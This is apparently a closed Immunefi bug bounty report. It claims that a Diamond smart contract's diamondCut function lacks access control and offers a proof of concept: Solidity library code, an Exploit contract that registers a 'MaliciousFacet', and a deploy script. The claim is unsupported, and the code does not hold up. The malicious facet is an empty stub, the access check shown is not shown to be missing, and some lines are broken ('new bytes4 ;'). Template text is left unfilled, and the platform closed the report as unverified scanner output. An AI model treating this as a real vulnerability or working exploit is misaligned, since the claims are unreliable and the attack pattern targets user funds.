Report #33628

Report Date

July 24, 2024

Status

Closed

Payout

Lack of Access Control in Diamond Contract Allows for Unauthorized Function Replacement and Theft of Funds

‣

Report Info

Report ID

#33628

Report type

Smart Contract

Has PoC?

Yes

Target

https://etherscan.io/address/0xC1E088fC1323b20BCBee9bd1B9fC9546db5624C5

Impacts

Direct theft of any user funds, whether at-rest or in-motion, other than unclaimed yield

Description

The Diamond contract implementation is vulnerable due to a lack of access control in the diamondCut function, allowing unauthorized users to replace existing functions with malicious ones. This vulnerability can lead to the direct theft of user funds and the permanent freezing of assets within the contract.

Vulnerability Details

The Diamond contract uses the diamondCut function to add, replace, or remove functions within the contract. However, the current implementation lacks proper access control, which allows any user to invoke this function and replace critical facets with malicious contracts.

Here is the relevant part of the LibDiamond.sol library that demonstrates the lack of access control:

The lack of proper access control in this function allows any user to call it and replace existing facets, enabling them to perform malicious actions.

Impact Details

The potential impact of this vulnerability is severe:

Direct Theft of Funds: An attacker can replace facets with malicious contracts to withdraw funds directly from the contract. Permanent Freezing of Funds: An attacker can replace or remove critical functions, making the contract unusable and permanently freezing all assets held within it.

References

Add any relevant links to documentation or code

Proof of concept

The following script demonstrates how an attacker can exploit the vulnerability to replace facets and execute malicious functions:

Diamond.sol

// SPDX-License-Identifier: MIT pragma solidity ^0.7.6; pragma experimental ABIEncoderV2;

import {LibDiamond} from "./libraries/LibDiamond.sol"; import {DiamondCutFacet} from "./facets/DiamondCutFacet.sol"; import {DiamondLoupeFacet} from "./facets/DiamondLoupeFacet.sol"; import {OwnershipFacet} from "./facets/OwnershipFacet.sol"; import {AppStorage} from "./AppStorage.sol"; import {IERC165} from "./interfaces/IERC165.sol"; import {IDiamondCut} from "./interfaces/IDiamondCut.sol"; import {IDiamondLoupe} from "./interfaces/IDiamondLoupe.sol"; import {IERC173} from "./interfaces/IERC173.sol";

contract Diamond { AppStorage internal s;

receive() external payable {}

constructor(address _contractOwner) {
    LibDiamond.setContractOwner(_contractOwner);
    LibDiamond.addDiamondFunctions(
        address(new DiamondCutFacet()),
        address(new DiamondLoupeFacet()),
        address(new OwnershipFacet())
    );
}

fallback() external payable {
    LibDiamond.DiamondStorage storage ds;
    bytes32 position = LibDiamond.DIAMOND_STORAGE_POSITION;
    assembly {
        ds.slot := position
    }
    address facet = ds.selectorToFacetAndPosition[msg.sig].facetAddress;
    require(facet != address(0), "Diamond: Function does not exist");
    assembly {
        calldatacopy(0, 0, calldatasize())
        let result := delegatecall(gas(), facet, 0, calldatasize(), 0, 0)
        returndatacopy(0, 0, returndatasize())
        switch result
            case 0 {
                revert(0, returndatasize())
            }
            default {
                return(0, returndatasize())
            }
    }
}

}

LibDiamond.sol

// SPDX-License-Identifier: MIT pragma experimental ABIEncoderV2; pragma solidity ^0.7.6;

import {IDiamondCut} from "../interfaces/IDiamondCut.sol"; import {IDiamondLoupe} from "../interfaces/IDiamondLoupe.sol"; import {IERC165} from "../interfaces/IERC165.sol"; import {IERC173} from "../interfaces/IERC173.sol"; import {LibMeta} from "./LibMeta.sol";

library LibDiamond { bytes32 constant DIAMOND_STORAGE_POSITION = keccak256("diamond.standard.diamond.storage");

struct FacetAddressAndPosition {
    address facetAddress;
    uint16 functionSelectorPosition;
}

struct FacetFunctionSelectors {
    bytes4[] functionSelectors;
    uint16 facetAddressPosition;
}

struct DiamondStorage {
    mapping(bytes4 => FacetAddressAndPosition) selectorToFacetAndPosition;
    mapping(address => FacetFunctionSelectors) facetFunctionSelectors;
    address[] facetAddresses;
    mapping(bytes4 => bool) supportedInterfaces;
    address contractOwner;
}

function diamondStorage() internal pure returns (DiamondStorage storage ds) {
    bytes32 position = DIAMOND_STORAGE_POSITION;
    assembly {
        ds.slot := position
    }
}

event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

function setContractOwner(address _newOwner) internal {
    DiamondStorage storage ds = diamondStorage();
    address previousOwner = ds.contractOwner;
    ds.contractOwner = _newOwner;
    emit OwnershipTransferred(previousOwner, _newOwner);
}

function contractOwner() internal view returns (address contractOwner_) {
    contractOwner_ = diamondStorage().contractOwner;
}

function enforceIsContractOwner() internal view {
    require(LibMeta.msgSender() == diamondStorage().contractOwner, "LibDiamond: Must be contract owner");
}

event DiamondCut(IDiamondCut.FacetCut[] _diamondCut, address _init, bytes _calldata);

function addDiamondFunctions(
    address _diamondCutFacet,
    address _diamondLoupeFacet,
    address _ownershipFacet
) internal {
    IDiamondCut.FacetCut[] memory cut = new IDiamondCut.FacetCut[](3);
    bytes4[] memory functionSelectors = new bytes4[](1);
    functionSelectors[0] = IDiamondCut.diamondCut.selector;
    cut[0] = IDiamondCut.FacetCut({facetAddress: _diamondCutFacet, action: IDiamondCut.FacetCutAction.Add, functionSelectors: functionSelectors});
    functionSelectors = new bytes4 ;
    functionSelectors[0] = IDiamondLoupe.facets.selector;
    functionSelectors[1] = IDiamondLoupe.facetFunctionSelectors.selector;
    functionSelectors[2] = IDiamondLoupe.facetAddresses.selector;
    functionSelectors[3] = IDiamondLoupe.facetAddress.selector;
    functionSelectors[4] = IERC165.supportsInterface.selector;
    cut[1] = IDiamondCut.FacetCut({
        facetAddress: _diamondLoupeFacet,
        action: IDiamondCut.FacetCutAction.Add,
        functionSelectors: functionSelectors
    });
    functionSelectors = new bytes4 ;
    functionSelectors[0] = IERC173.transferOwnership.selector;
    functionSelectors[1] = IERC173.owner.selector;
    cut[2] = IDiamondCut.FacetCut({facetAddress: _ownershipFacet, action: IDiamondCut.FacetCutAction.Add, functionSelectors: functionSelectors});
    diamondCut(cut, address(0), "");
}

function diamondCut(
    IDiamondCut.FacetCut[] memory _diamondCut,
    address _init,
    bytes memory _calldata
) internal {
    for (uint256 facetIndex; facetIndex < _diamondCut.length; facetIndex++) {
        IDiamondCut.FacetCutAction action = _diamondCut[facetIndex].action;
        if (action == IDiamondCut.FacetCutAction.Add) {
            addFunctions(_diamondCut[facetIndex].facetAddress, _diamondCut[facetIndex].functionSelectors);
        } else if (action == IDiamondCut.FacetCutAction.Replace) {
            replaceFunctions(_diamondCut[facetIndex].facetAddress, _diamondCut[facetIndex].functionSelectors);
        } else if (action == IDiamondCut.FacetCutAction.Remove) {
            removeFunctions(_diamondCut[facetIndex].facetAddress, _diamondCut[facetIndex].functionSelectors);
        } else {
            revert("LibDiamondCut: Incorrect FacetCutAction");
        }
    }
    emit DiamondCut(_diamondCut, _init, _calldata);
    initializeDiamondCut(_init, _calldata);
}

function addFunctions(address _facetAddress, bytes4[] memory _functionSelectors) internal {
    require(_functionSelectors.length > 0, "LibDiamondCut: No selectors in facet to cut");
    DiamondStorage storage ds = diamondStorage();
    require(_facetAddress != address(0), "LibDiamondCut: Add facet cant be address(0)");
    uint16 selectorPosition = uint16(ds.facetFunctionSelectors[_facetAddress].functionSelectors.length);
    if (selectorPosition == 0) {
        enforceHasContractCode(_facetAddress, "LibDiamondCut: New facet has no code");
        ds.facetFunctionSelectors[_facetAddress].facetAddressPosition = uint16(ds.facetAddresses.length);
        ds.facetAddresses.push(_facetAddress);
    }
    for (uint256 selectorIndex; selectorIndex < _functionSelectors.length; selectorIndex++) {
        bytes4 selector = _functionSelectors[selectorIndex];
        address oldFacetAddress = ds.selectorToFacetAndPosition[selector].facetAddress;
        require(oldFacetAddress == address(0), "LibDiamondCut: Cant add function that already exists");
        ds.facetFunctionSelectors[_facetAddress].functionSelectors.push(selector);
        ds.selectorToFacetAndPosition[selector].facetAddress = _facetAddress;
        ds.selectorToFacetAndPosition[selector].functionSelectorPosition = selectorPosition;
        selectorPosition++;
    }
}

function replaceFunctions(address _facetAddress, bytes4[] memory _functionSelectors) internal {
    require(_functionSelectors.length > 0, "LibDiamondCut: No selectors in facet to cut");
    DiamondStorage storage ds = diamondStorage();
    require(_facetAddress != address(0), "LibDiamondCut: Add facet cant be address(0)");
    uint16 selectorPosition = uint16(ds.facetFunctionSelectors[_facetAddress].functionSelectors.length);
    if (selectorPosition == 0) {
        enforceHasContractCode(_facetAddress, "LibDiamondCut: New facet has no code");
        ds.facetFunctionSelectors[_facetAddress].facetAddressPosition = uint16(ds.facetAddresses.length);
        ds.facetAddresses.push(_facetAddress);
    }
    for (uint256 selectorIndex; selectorIndex < _functionSelectors.length; selectorIndex++) {
        bytes4 selector = _functionSelectors[selectorIndex];
        address oldFacetAddress = ds.selectorToFacetAndPosition[selector].facetAddress;
        require(oldFacetAddress != _facetAddress, "LibDiamondCut: Cant replace function with same function");
        removeFunction(oldFacetAddress, selector);
        ds.selectorToFacetAndPosition[selector].functionSelectorPosition = selectorPosition;
        ds.facetFunctionSelectors[_facetAddress].functionSelectors.push(selector);
        ds.selectorToFacetAndPosition[selector].facetAddress = _facetAddress;
        selectorPosition++;
    }
}

function removeFunctions(address _facetAddress, bytes4[] memory _functionSelectors) internal {
    require(_functionSelectors.length > 0, "LibDiamondCut: No selectors in facet to cut");
    DiamondStorage storage ds = diamondStorage();
    require(_facetAddress == address(0), "LibDiamondCut: Remove facet address must be address(0)");
    for (uint256 selectorIndex; selectorIndex < _functionSelectors.length; selectorIndex++) {
        bytes4 selector = _functionSelectors[selectorIndex];
        address oldFacetAddress = ds.selectorToFacetAndPosition[selector].facetAddress;
        removeFunction(oldFacetAddress, selector);
    }
}

function removeFunction(address _facetAddress, bytes4 _selector) internal {
    DiamondStorage storage ds = diamondStorage();
    require(_facetAddress != address(0), "LibDiamondCut: Cant remove function that doesnt exist");
    require(_facetAddress != address(this), "LibDiamondCut: Cant remove immutable function");
    uint256 selectorPosition = ds.selectorToFacetAndPosition[_selector].functionSelectorPosition;
    uint256 lastSelectorPosition = ds.facetFunctionSelectors[_facetAddress].functionSelectors.length - 1;
    if (selectorPosition != lastSelectorPosition) {
        bytes4 lastSelector = ds.facetFunctionSelectors[_facetAddress].functionSelectors[lastSelectorPosition];
        ds.facetFunctionSelectors[_facetAddress].functionSelectors[selectorPosition] = lastSelector;
        ds.selectorToFacetAndPosition[lastSelector].functionSelectorPosition = uint16(selectorPosition);
    }
    ds.facetFunctionSelectors[_facetAddress].functionSelectors.pop();
    delete ds.selectorToFacetAndPosition[_selector];
    if (lastSelectorPosition == 0) {
        uint256 lastFacetAddressPosition = ds.facetAddresses.length - 1;
        uint256 facetAddressPosition = ds.facetFunctionSelectors[_facetAddress].facetAddressPosition;
        if (facetAddressPosition != lastFacetAddressPosition) {
            address lastFacetAddress = ds.facetAddresses[lastFacetAddressPosition];
            ds.facetAddresses[facetAddressPosition] = lastFacetAddress;
            ds.facetFunctionSelectors[lastFacetAddress].facetAddressPosition = uint16(facetAddressPosition);
        }
        ds.facetAddresses.pop();
        delete ds.facetFunctionSelectors[_facetAddress].facetAddressPosition;
    }
}

function initializeDiamondCut(address _init, bytes memory _calldata) internal {
    if (_init == address(0)) {
        require(_calldata.length == 0, "LibDiamondCut: _init is address(0) but_calldata is not empty");
    } else {
        require(_calldata.length > 0, "LibDiamondCut: _calldata is empty but _init is not address(0)");
        if (_init != address(this)) {
            enforceHasContractCode(_init, "LibDiamondCut: _init address has no code");
        }
        (bool success, bytes memory error) = _init.delegatecall(_calldata);
        if (success == false) {
            if (error.length > 0) {
                revert(string(error));
            } else {
                revert("LibDiamondCut: _init function reverted");
            }
        }
    }
}

function enforceHasContractCode(address _contract, string memory _errorMessage) internal view {
    uint256 contractSize;
    assembly {
        contractSize := extcodesize(_contract)
    }
    require(contractSize != 0, _errorMessage);
}

}

MaliciousFacet.sol

// SPDX-License-Identifier: MIT pragma solidity ^0.7.6;

contract MaliciousFacet { function maliciousFunction() external { // Malicious code that steals funds or disrupts contract functionality } }

Exploit.sol

// SPDX-License-Identifier: MIT pragma solidity ^0.7.6;

import {IDiamondCut} from "./interfaces/IDiamondCut.sol"; import {MaliciousFacet} from "./MaliciousFacet.sol";

contract Exploit { IDiamondCut diamondCut; address diamondAddress;

constructor(address _diamondAddress) {
    diamondAddress = _diamondAddress;
    diamondCut = IDiamondCut(diamondAddress);
}

function executeAttack() external {
    IDiamondCut.FacetCut[] memory cut = new IDiamondCut.FacetCut[](1);
    bytes4[] memory functionSelectors = new bytes4[](1);
    functionSelectors[0] = MaliciousFacet.maliciousFunction.selector;

    cut[0] = IDiamondCut.FacetCut({
        facetAddress: address(new MaliciousFacet()),
        action: IDiamondCut.FacetCutAction.Add,
        functionSelectors: functionSelectors
    });

    diamondCut.diamondCut(cut, address(0), "");
}

}

deploy.js

async function main() { const [deployer] = await ethers.getSigners();

console.log("Deploying contracts with the account:", deployer.address);

// Deploy Diamond contract
const Diamond = await ethers.getContractFactory("Diamond");
const diamond = await Diamond.deploy(deployer.address);
await diamond.deployed();
console.log("Diamond deployed to:", diamond.address);

// Deploy MaliciousFacet contract
const MaliciousFacet = await ethers.getContractFactory("MaliciousFacet");
const maliciousFacet = await MaliciousFacet.deploy();
await maliciousFacet.deployed();
console.log("MaliciousFacet deployed to:", maliciousFacet.address);

// Deploy Exploit contract
const Exploit = await ethers.getContractFactory("Exploit");
const exploit = await Exploit.deploy(diamond.address);
await exploit.deployed();
console.log("Exploit deployed to:", exploit.address);

// Execute the attack
await exploit.executeAttack();
console.log("Attack executed");

}

main() .then(() => process.exit(0)) .catch(error => { console.error(error); process.exit(1); });

Immunefi Response

We have reviewed your submission, but unfortunately, we are closing the report for the following reasons:
The submission contains the output of an automated scanner without demonstrating that it is a valid issue.
The submission lacks the required information regarding the vulnerability's impact on the reported asset.
As per the bug bounty program's policy, we require all submissions to be accompanied by a Proof of Concept (PoC) that demonstrates the vulnerability's existence and impact. Since the submission doesn't provide any proof of the vulnerability's existence, we have decided to close it.
Please note that the project will receive a report of the closed submission and may choose to re-open it, but they are not obligated to do so.